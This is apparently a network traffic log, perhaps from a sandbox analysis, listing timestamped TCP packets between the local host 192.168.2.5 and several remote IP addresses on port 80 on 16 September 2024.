                                                  Sep 16, 2024 09:39:28.343379021 CEST4972680192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:28.348160982 CEST80497263.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:39:29.854942083 CEST4972680192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:29.860075951 CEST80497263.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:39:29.860321045 CEST4972680192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:30.925614119 CEST4972780192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:30.931443930 CEST80497273.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:39:30.931561947 CEST4972780192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:30.947163105 CEST4972780192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:30.952959061 CEST80497273.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:39:30.953057051 CEST80497273.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:39:31.392275095 CEST80497273.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:39:31.392340899 CEST4972780192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:32.463562965 CEST4972780192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:32.468478918 CEST80497273.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:39:33.531539917 CEST4972880192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:33.536536932 CEST80497283.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:39:33.539658070 CEST4972880192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:33.559560061 CEST4972880192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:33.564409018 CEST80497283.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:39:36.928082943 CEST80497283.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:39:36.928137064 CEST80497283.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:39:36.928246975 CEST4972880192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:36.930953979 CEST4972880192.168.2.53.33.130.190
                                                  Sep 16, 2024 09:39:36.935704947 CEST80497283.33.130.190192.168.2.5
                                                  Sep 16, 2024 09:39:50.185074091 CEST4972980192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:50.191167116 CEST8049729199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:50.195285082 CEST4972980192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:50.206973076 CEST4972980192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:50.212172031 CEST8049729199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:50.728400946 CEST8049729199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:50.728446960 CEST8049729199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:50.728463888 CEST8049729199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:50.728486061 CEST4972980192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:50.728513956 CEST4972980192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:51.714595079 CEST4972980192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:52.732867956 CEST4973080192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:52.737734079 CEST8049730199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:52.737807035 CEST4973080192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:52.752088070 CEST4973080192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:52.756974936 CEST8049730199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:53.196399927 CEST8049730199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:53.196472883 CEST8049730199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:53.196489096 CEST8049730199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:53.196513891 CEST4973080192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:53.196554899 CEST4973080192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:54.263051033 CEST4973080192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:55.279623032 CEST4973180192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:55.284421921 CEST8049731199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:55.284550905 CEST4973180192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:55.295613050 CEST4973180192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:55.300571918 CEST8049731199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:55.300585985 CEST8049731199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:55.748812914 CEST8049731199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:55.748838902 CEST8049731199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:55.748855114 CEST8049731199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:55.749003887 CEST4973180192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:56.807399035 CEST4973180192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:57.827155113 CEST4973280192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:57.832179070 CEST8049732199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:57.832321882 CEST4973280192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:57.840626955 CEST4973280192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:57.845439911 CEST8049732199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:58.290278912 CEST8049732199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:58.290292025 CEST8049732199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:58.290302992 CEST8049732199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:58.290314913 CEST8049732199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:39:58.290493965 CEST4973280192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:58.290493965 CEST4973280192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:58.295156002 CEST4973280192.168.2.5199.59.243.226
                                                  Sep 16, 2024 09:39:58.299990892 CEST8049732199.59.243.226192.168.2.5
                                                  Sep 16, 2024 09:40:03.476825953 CEST4973380192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:03.481820107 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:03.481914043 CEST4973380192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:03.496592045 CEST4973380192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:03.501640081 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.086756945 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.086779118 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.086791992 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.086803913 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.086816072 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.086828947 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.086951971 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.086962938 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.086973906 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.086986065 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.087002039 CEST4973380192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:04.087002039 CEST4973380192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:04.087002039 CEST4973380192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:04.087407112 CEST4973380192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:04.092001915 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.092015982 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.092027903 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.092040062 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.092051983 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.092144966 CEST4973380192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:04.092144966 CEST4973380192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:04.173852921 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.173954964 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.173969030 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.174010992 CEST8049733162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:04.174063921 CEST4973380192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:04.174247026 CEST4973380192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:05.011080980 CEST4973380192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:06.032664061 CEST4973480192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:06.037602901 CEST8049734162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:06.038577080 CEST4973480192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:06.052649021 CEST4973480192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:06.057580948 CEST8049734162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:07.557348967 CEST4973480192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:07.608635902 CEST8049734162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:08.576570988 CEST4973580192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:08.581487894 CEST8049735162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:08.581552029 CEST4973580192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:08.594481945 CEST4973580192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:08.599368095 CEST8049735162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:08.599423885 CEST8049735162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:10.104367971 CEST4973580192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:10.208085060 CEST8049735162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:10.208101988 CEST8049735162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:10.208112955 CEST8049735162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:10.208118916 CEST8049735162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:10.208122969 CEST8049735162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:10.208132982 CEST8049735162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:10.208137989 CEST8049735162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:10.208148003 CEST8049735162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:10.208168983 CEST8049735162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:10.208178997 CEST8049735162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:10.208187103 CEST4973580192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:10.208189011 CEST8049735162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:10.208203077 CEST8049735162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:10.208213091 CEST8049734162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:10.208218098 CEST4973580192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:10.208218098 CEST4973580192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:10.208226919 CEST4973580192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:10.208226919 CEST4973580192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:10.208252907 CEST4973580192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:10.208252907 CEST4973580192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:10.208275080 CEST4973480192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:10.208297014 CEST8049734162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:10.208395004 CEST8049735162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:10.208429098 CEST4973480192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:10.208445072 CEST4973580192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:10.208481073 CEST8049734162.0.239.141192.168.2.5
                                                  Sep 16, 2024 09:40:10.208782911 CEST4973480192.168.2.5162.0.239.141
                                                  Sep 16, 2024 09:40:10.209541082 CEST8049735162.0.239.141192.168.2.5
Sep 16, 2024 09:40:10.209602118 CEST | 49735       | 80        | 192.168.2.5     | 162.0.239.141
Sep 16, 2024 09:40:10.216156006 CEST | 80          | 49734     | 162.0.239.141   | 192.168.2.5
Sep 16, 2024 09:40:10.216169119 CEST | 80          | 49734     | 162.0.239.141   | 192.168.2.5
Sep 16, 2024 09:40:11.123816013 CEST | 49736       | 80        | 192.168.2.5     | 162.0.239.141
Sep 16, 2024 09:40:11.128886938 CEST | 80          | 49736     | 162.0.239.141   | 192.168.2.5
Sep 16, 2024 09:40:11.128974915 CEST | 49736       | 80        | 192.168.2.5     | 162.0.239.141
Sep 16, 2024 09:40:11.140705109 CEST | 49736       | 80        | 192.168.2.5     | 162.0.239.141
Sep 16, 2024 09:40:11.145577908 CEST | 80          | 49736     | 162.0.239.141   | 192.168.2.5
Sep 16, 2024 09:40:11.717657089 CEST | 80          | 49736     | 162.0.239.141   | 192.168.2.5
Sep 16, 2024 09:40:11.717679024 CEST | 80          | 49736     | 162.0.239.141   | 192.168.2.5
Sep 16, 2024 09:40:11.717694044 CEST | 80          | 49736     | 162.0.239.141   | 192.168.2.5
Sep 16, 2024 09:40:11.717708111 CEST | 80          | 49736     | 162.0.239.141   | 192.168.2.5
Sep 16, 2024 09:40:11.717724085 CEST | 80          | 49736     | 162.0.239.141   | 192.168.2.5
Sep 16, 2024 09:40:11.717739105 CEST | 80          | 49736     | 162.0.239.141   | 192.168.2.5
Sep 16, 2024 09:40:11.717753887 CEST | 80          | 49736     | 162.0.239.141   | 192.168.2.5
Sep 16, 2024 09:40:11.717767000 CEST | 80          | 49736     | 162.0.239.141   | 192.168.2.5
Sep 16, 2024 09:40:11.717782021 CEST | 80          | 49736     | 162.0.239.141   | 192.168.2.5
Sep 16, 2024 09:40:11.717811108 CEST | 49736       | 80        | 192.168.2.5     | 162.0.239.141
Sep 16, 2024 09:40:11.718095064 CEST | 49736       | 80        | 192.168.2.5     | 162.0.239.141
Sep 16, 2024 09:40:11.718167067 CEST | 80          | 49736     | 162.0.239.141   | 192.168.2.5
Sep 16, 2024 09:40:11.720654011 CEST | 49736       | 80        | 192.168.2.5     | 162.0.239.141
Sep 16, 2024 09:40:11.722666979 CEST | 80          | 49736     | 162.0.239.141   | 192.168.2.5
Sep 16, 2024 09:40:11.722677946 CEST | 80          | 49736     | 162.0.239.141   | 192.168.2.5
Sep 16, 2024 09:40:11.722692966 CEST | 80          | 49736     | 162.0.239.141   | 192.168.2.5
Sep 16, 2024 09:40:11.722703934 CEST | 80          | 49736     | 162.0.239.141   | 192.168.2.5
Sep 16, 2024 09:40:11.722728014 CEST | 49736       | 80        | 192.168.2.5     | 162.0.239.141
Sep 16, 2024 09:40:11.722796917 CEST | 49736       | 80        | 192.168.2.5     | 162.0.239.141
Sep 16, 2024 09:40:11.804210901 CEST | 80          | 49736     | 162.0.239.141   | 192.168.2.5
Sep 16, 2024 09:40:11.804229975 CEST | 80          | 49736     | 162.0.239.141   | 192.168.2.5
Sep 16, 2024 09:40:11.804241896 CEST | 80          | 49736     | 162.0.239.141   | 192.168.2.5
Sep 16, 2024 09:40:11.804335117 CEST | 80          | 49736     | 162.0.239.141   | 192.168.2.5
Sep 16, 2024 09:40:11.804486036 CEST | 49736       | 80        | 192.168.2.5     | 162.0.239.141
Sep 16, 2024 09:40:11.804486036 CEST | 49736       | 80        | 192.168.2.5     | 162.0.239.141
Sep 16, 2024 09:40:11.808115959 CEST | 49736       | 80        | 192.168.2.5     | 162.0.239.141
Sep 16, 2024 09:40:11.813087940 CEST | 80          | 49736     | 162.0.239.141   | 192.168.2.5
Sep 16, 2024 09:40:24.949824095 CEST | 49737       | 80        | 192.168.2.5     | 84.32.84.32
Sep 16, 2024 09:40:24.959258080 CEST | 80          | 49737     | 84.32.84.32     | 192.168.2.5
Sep 16, 2024 09:40:24.959326029 CEST | 49737       | 80        | 192.168.2.5     | 84.32.84.32
Sep 16, 2024 09:40:24.971071005 CEST | 49737       | 80        | 192.168.2.5     | 84.32.84.32
Sep 16, 2024 09:40:24.975797892 CEST | 80          | 49737     | 84.32.84.32     | 192.168.2.5
Sep 16, 2024 09:40:25.435020924 CEST | 80          | 49737     | 84.32.84.32     | 192.168.2.5
Sep 16, 2024 09:40:25.435087919 CEST | 49737       | 80        | 192.168.2.5     | 84.32.84.32
Sep 16, 2024 09:40:26.479262114 CEST | 49737       | 80        | 192.168.2.5     | 84.32.84.32
Sep 16, 2024 09:40:26.484210968 CEST | 80          | 49737     | 84.32.84.32     | 192.168.2.5
Sep 16, 2024 09:40:27.498574972 CEST | 49738       | 80        | 192.168.2.5     | 84.32.84.32
Sep 16, 2024 09:40:27.503473997 CEST | 80          | 49738     | 84.32.84.32     | 192.168.2.5
Sep 16, 2024 09:40:27.503885984 CEST | 49738       | 80        | 192.168.2.5     | 84.32.84.32
Sep 16, 2024 09:40:27.515270948 CEST | 49738       | 80        | 192.168.2.5     | 84.32.84.32
Sep 16, 2024 09:40:27.520478964 CEST | 80          | 49738     | 84.32.84.32     | 192.168.2.5
Sep 16, 2024 09:40:27.960931063 CEST | 80          | 49738     | 84.32.84.32     | 192.168.2.5
Sep 16, 2024 09:40:27.962763071 CEST | 49738       | 80        | 192.168.2.5     | 84.32.84.32
Sep 16, 2024 09:40:29.028937101 CEST | 49738       | 80        | 192.168.2.5     | 84.32.84.32
Sep 16, 2024 09:40:29.034439087 CEST | 80          | 49738     | 84.32.84.32     | 192.168.2.5
Sep 16, 2024 09:40:30.045017958 CEST | 49739       | 80        | 192.168.2.5     | 84.32.84.32
Sep 16, 2024 09:40:30.051208973 CEST | 80          | 49739     | 84.32.84.32     | 192.168.2.5
Sep 16, 2024 09:40:30.051348925 CEST | 49739       | 80        | 192.168.2.5     | 84.32.84.32
Sep 16, 2024 09:40:30.062365055 CEST | 49739       | 80        | 192.168.2.5     | 84.32.84.32
Sep 16, 2024 09:40:30.067523956 CEST | 80          | 49739     | 84.32.84.32     | 192.168.2.5
Sep 16, 2024 09:40:30.067542076 CEST | 80          | 49739     | 84.32.84.32     | 192.168.2.5
Sep 16, 2024 09:40:30.536211014 CEST | 80          | 49739     | 84.32.84.32     | 192.168.2.5
Sep 16, 2024 09:40:30.536273956 CEST | 49739       | 80        | 192.168.2.5     | 84.32.84.32
Sep 16, 2024 09:40:31.573590994 CEST | 49739       | 80        | 192.168.2.5     | 84.32.84.32
Sep 16, 2024 09:40:31.578677893 CEST | 80          | 49739     | 84.32.84.32     | 192.168.2.5
Sep 16, 2024 09:40:32.593368053 CEST | 49740       | 80        | 192.168.2.5     | 84.32.84.32
Sep 16, 2024 09:40:32.598244905 CEST | 80          | 49740     | 84.32.84.32     | 192.168.2.5
Sep 16, 2024 09:40:32.598310947 CEST | 49740       | 80        | 192.168.2.5     | 84.32.84.32
Sep 16, 2024 09:40:32.607336044 CEST | 49740       | 80        | 192.168.2.5     | 84.32.84.32
Sep 16, 2024 09:40:32.612112045 CEST | 80          | 49740     | 84.32.84.32     | 192.168.2.5
Sep 16, 2024 09:40:33.098380089 CEST | 80          | 49740     | 84.32.84.32     | 192.168.2.5
Sep 16, 2024 09:40:33.098412991 CEST | 80          | 49740     | 84.32.84.32     | 192.168.2.5
Sep 16, 2024 09:40:33.098427057 CEST | 80          | 49740     | 84.32.84.32     | 192.168.2.5
Sep 16, 2024 09:40:33.098500013 CEST | 49740       | 80        | 192.168.2.5     | 84.32.84.32
Sep 16, 2024 09:40:33.098520994 CEST | 80          | 49740     | 84.32.84.32     | 192.168.2.5
Sep 16, 2024 09:40:33.098532915 CEST | 80          | 49740     | 84.32.84.32     | 192.168.2.5
Sep 16, 2024 09:40:33.098545074 CEST | 80          | 49740     | 84.32.84.32     | 192.168.2.5
Sep 16, 2024 09:40:33.098555088 CEST | 80          | 49740     | 84.32.84.32     | 192.168.2.5
Sep 16, 2024 09:40:33.098557949 CEST | 49740       | 80        | 192.168.2.5     | 84.32.84.32
Sep 16, 2024 09:40:33.098592043 CEST | 80          | 49740     | 84.32.84.32     | 192.168.2.5
Sep 16, 2024 09:40:33.098603010 CEST | 80          | 49740     | 84.32.84.32     | 192.168.2.5
Sep 16, 2024 09:40:33.098640919 CEST | 49740       | 80        | 192.168.2.5     | 84.32.84.32
Sep 16, 2024 09:40:33.098685980 CEST | 49740       | 80        | 192.168.2.5     | 84.32.84.32
Sep 16, 2024 09:40:33.098695993 CEST | 80          | 49740     | 84.32.84.32     | 192.168.2.5
Sep 16, 2024 09:40:33.098735094 CEST | 49740       | 80        | 192.168.2.5     | 84.32.84.32
Sep 16, 2024 09:40:33.104295015 CEST | 49740       | 80        | 192.168.2.5     | 84.32.84.32
Sep 16, 2024 09:40:33.109241962 CEST | 80          | 49740     | 84.32.84.32     | 192.168.2.5
Sep 16, 2024 09:40:47.193717003 CEST | 49741       | 80        | 192.168.2.5     | 154.23.176.197
Sep 16, 2024 09:40:47.198566914 CEST | 80          | 49741     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:47.198630095 CEST | 49741       | 80        | 192.168.2.5     | 154.23.176.197
Sep 16, 2024 09:40:47.215579987 CEST | 49741       | 80        | 192.168.2.5     | 154.23.176.197
Sep 16, 2024 09:40:47.220437050 CEST | 80          | 49741     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:48.170674086 CEST | 80          | 49741     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:48.170694113 CEST | 80          | 49741     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:48.170706987 CEST | 80          | 49741     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:48.170763016 CEST | 80          | 49741     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:48.170933008 CEST | 80          | 49741     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:48.170943022 CEST | 80          | 49741     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:48.170963049 CEST | 49741       | 80        | 192.168.2.5     | 154.23.176.197
Sep 16, 2024 09:40:48.171073914 CEST | 80          | 49741     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:48.171087027 CEST | 80          | 49741     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:48.171399117 CEST | 49741       | 80        | 192.168.2.5     | 154.23.176.197
Sep 16, 2024 09:40:48.171421051 CEST | 49741       | 80        | 192.168.2.5     | 154.23.176.197
Sep 16, 2024 09:40:48.729382992 CEST | 49741       | 80        | 192.168.2.5     | 154.23.176.197
Sep 16, 2024 09:40:49.748785019 CEST | 49742       | 80        | 192.168.2.5     | 154.23.176.197
Sep 16, 2024 09:40:49.754757881 CEST | 80          | 49742     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:49.756895065 CEST | 49742       | 80        | 192.168.2.5     | 154.23.176.197
Sep 16, 2024 09:40:49.773149014 CEST | 49742       | 80        | 192.168.2.5     | 154.23.176.197
Sep 16, 2024 09:40:49.778547049 CEST | 80          | 49742     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:50.724030972 CEST | 80          | 49742     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:50.724059105 CEST | 80          | 49742     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:50.724097013 CEST | 49742       | 80        | 192.168.2.5     | 154.23.176.197
Sep 16, 2024 09:40:50.724909067 CEST | 80          | 49742     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:50.724920034 CEST | 80          | 49742     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:50.724931955 CEST | 80          | 49742     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:50.724958897 CEST | 80          | 49742     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:50.724966049 CEST | 49742       | 80        | 192.168.2.5     | 154.23.176.197
Sep 16, 2024 09:40:50.724972963 CEST | 80          | 49742     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:50.725014925 CEST | 49742       | 80        | 192.168.2.5     | 154.23.176.197
Sep 16, 2024 09:40:51.276144028 CEST | 49742       | 80        | 192.168.2.5     | 154.23.176.197
Sep 16, 2024 09:40:52.296681881 CEST | 49743       | 80        | 192.168.2.5     | 154.23.176.197
Sep 16, 2024 09:40:52.302975893 CEST | 80          | 49743     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:52.303131104 CEST | 49743       | 80        | 192.168.2.5     | 154.23.176.197
Sep 16, 2024 09:40:52.314702988 CEST | 49743       | 80        | 192.168.2.5     | 154.23.176.197
Sep 16, 2024 09:40:52.320363998 CEST | 80          | 49743     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:52.320413113 CEST | 80          | 49743     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:53.450965881 CEST | 80          | 49743     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:53.450989962 CEST | 80          | 49743     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:53.450994968 CEST | 80          | 49743     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:53.450999022 CEST | 80          | 49743     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:53.451006889 CEST | 80          | 49743     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:53.451009989 CEST | 80          | 49743     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:53.451047897 CEST | 80          | 49743     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:53.451119900 CEST | 80          | 49743     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:53.451133013 CEST | 80          | 49743     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:53.451272964 CEST | 49743       | 80        | 192.168.2.5     | 154.23.176.197
Sep 16, 2024 09:40:53.451277971 CEST | 49743       | 80        | 192.168.2.5     | 154.23.176.197
Sep 16, 2024 09:40:53.823040009 CEST | 49743       | 80        | 192.168.2.5     | 154.23.176.197
Sep 16, 2024 09:40:54.843424082 CEST | 49744       | 80        | 192.168.2.5     | 154.23.176.197
Sep 16, 2024 09:40:54.849472046 CEST | 80          | 49744     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:54.849560022 CEST | 49744       | 80        | 192.168.2.5     | 154.23.176.197
Sep 16, 2024 09:40:54.858746052 CEST | 49744       | 80        | 192.168.2.5     | 154.23.176.197
Sep 16, 2024 09:40:54.863647938 CEST | 80          | 49744     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:55.801822901 CEST | 80          | 49744     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:55.801841021 CEST | 80          | 49744     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:55.801850080 CEST | 80          | 49744     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:55.801861048 CEST | 80          | 49744     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:55.801872015 CEST | 80          | 49744     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:55.801882029 CEST | 80          | 49744     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:55.801919937 CEST | 80          | 49744     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:55.801930904 CEST | 80          | 49744     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:55.801940918 CEST | 80          | 49744     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:55.801949978 CEST | 80          | 49744     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:55.803698063 CEST | 49744       | 80        | 192.168.2.5     | 154.23.176.197
Sep 16, 2024 09:40:55.808562040 CEST | 80          | 49744     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:55.808573961 CEST | 80          | 49744     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:55.808583975 CEST | 80          | 49744     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:55.812848091 CEST | 49744       | 80        | 192.168.2.5     | 154.23.176.197
Sep 16, 2024 09:40:56.024595022 CEST | 80          | 49744     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:56.024612904 CEST | 80          | 49744     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:56.024668932 CEST | 80          | 49744     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:56.024681091 CEST | 80          | 49744     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:56.024691105 CEST | 80          | 49744     | 154.23.176.197  | 192.168.2.5
Sep 16, 2024 09:40:56.024935961 CEST | 49744       | 80        | 192.168.2.5     | 154.23.176.197
